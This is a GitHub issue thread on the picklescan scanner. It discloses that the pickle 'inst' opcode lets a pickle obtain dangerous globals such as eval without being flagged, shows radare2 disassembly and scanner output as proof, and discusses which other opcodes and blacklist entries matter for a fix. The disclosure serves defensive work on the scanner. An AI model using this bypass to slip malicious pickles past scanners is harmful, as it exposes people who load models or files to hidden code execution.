### ISSUE TITLE
Dangerous global detection bypass with `inst` instruction

### ISSUE THREAD

**Issue by dennis-doyensec** [mmaitre314/picklescan#13]
### The bypass

The `inst` instruction is very similar to `global`. The only difference is that
`inst` automatically calls the returned global object as a function. Since the
`inst` instruction is not handled by `picklescan`, it can be used by malware to
obtain dangerous functions without detection.

### Example:

The following example uses [radare2](https://rada.re/n/) (`rasm2` and `r2`
commands) with the [r2pickledec](https://github.com/doyensec/r2pickledec)
plugin.

The pickle stored in the `test.pickle` file returns the dangerous function `eval`. Picklescan 
considers it safe because no `global` or `stack_global` instruction is ever used.

```sh
$ rasm2 -a pickle -dBf test.pickle ## disassemble the pickle
mark
short_binstring "eval"
inst "builtins eval"
stop

$ r2 -a pickle -qqc 'pdP' test.pickle   # decompile the pickle to show how it works
## VM stack start, len 1
## VM[0] TOP
g_eval_x7 = _find_class("builtins", "eval")
return g_eval_x7("eval")

$ python3 -m pickle test.pickle
<built-in function eval>

$ picklescan -p test.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
```

### Suggested fix

Parse the `inst` instruction the same way the `global` instruction is parsed.

**Comment by mmaitre314** [comment]
Thanks for the detailed report. Looking into a fix.

**Comment by dennis-doyensec** [comment]
Let me know if you have any questions. I realize I never gave you byte code, so I can provide that if you like.

**Comment by mmaitre314** [comment]
Next step on my side is to read the docs to address some knowledge gaps. This is more likely to happen after baby starts daycare...

**Comment by dennis-doyensec** [comment]
Sadly, it will probably be easier to get answers from the pickle source code. I have not seen any deep documentation on individual pickle instructions. The pickletools source code has some good comments to get started, but still not much depth.

**Comment by McPatate** [comment]
From [pickletools source](https://github.com/python/cpython/blob/main/Lib/pickletools.py)
> This is the protocol 0 version of protocol 1's OBJ opcode.

I assume we have to handle `OBJ`, `NEWOBJ` and `NEWOBJ_EX` as well.

**Comment by dennis-doyensec** [comment]
> From [pickletools source](https://github.com/python/cpython/blob/4dc593477a2e8a5c22e3e2346aaae05ca46b12cb/Lib/pickletools.py#L2017)
> 
> > This is the protocol 0 version of protocol 1's OBJ opcode.
> 
> I assume we have to handle `OBJ`, `NEWOBJ` and `NEWOBJ_EX` as well.

I don't think so. It's hard to find a `newobj` example, here is one that works.

```
string "requests.sessions"
string "Session"
stack_global
empty_tuple
newobj
stop
```

So this will make a requests session using `newobj`. Your code will already catch this. The `newobj` does not create a new gloabal, it just uses the one from `stack_global`. 

All new globals seem to funnel through the [find_class](https://github.com/python/cpython/blob/main/Lib/pickle.py#L1564) method. This method is used in `load_inst` for the `inst` instruction, `load_global` for the `global` opcode, `load_stack_global` for the `stack_global` opcode and `get_extension` which covers the `ext*` family of opcodes (multiple depending on how big the opcode is).

You need to cover `inst`, you don't need to cover `ext*` opcodes and you already cover everything else. So I think `inst` is all that is needed.

### Why you don't need to cover `ext1`, `ext2`, `ext4` opcodes

The `ext*` family of opcodes are intended for compression. I don't think many people use them. The developer who will be unserializing, needs to populate the extension dictionary with objects before unserializing. Then when the unserializer encounters `ext1 42`, the element at key `42` in the extension dictionary is put onto the stack. If there is nothing at key `42`, then an error is raised.

There is nothing to prevent an attacker from adding something to the extension dictionary themselves. I do this as a form of obfuscation in the sample I released  [here](https://github.com/swoops/video-game-save-file-trojans#further-research).

Your code won't be fooled though. There is no opcode to insert into the extension dictionary. You must use one of the other methods of obtaining a global. Those methods you already cover.

Speaking of which, I think it would be wise to add the `pickle` and `copyreg` to the blacklist. They offer a lot of powerful obfuscation primitives. Using `ext*` opcodes is just one of them.
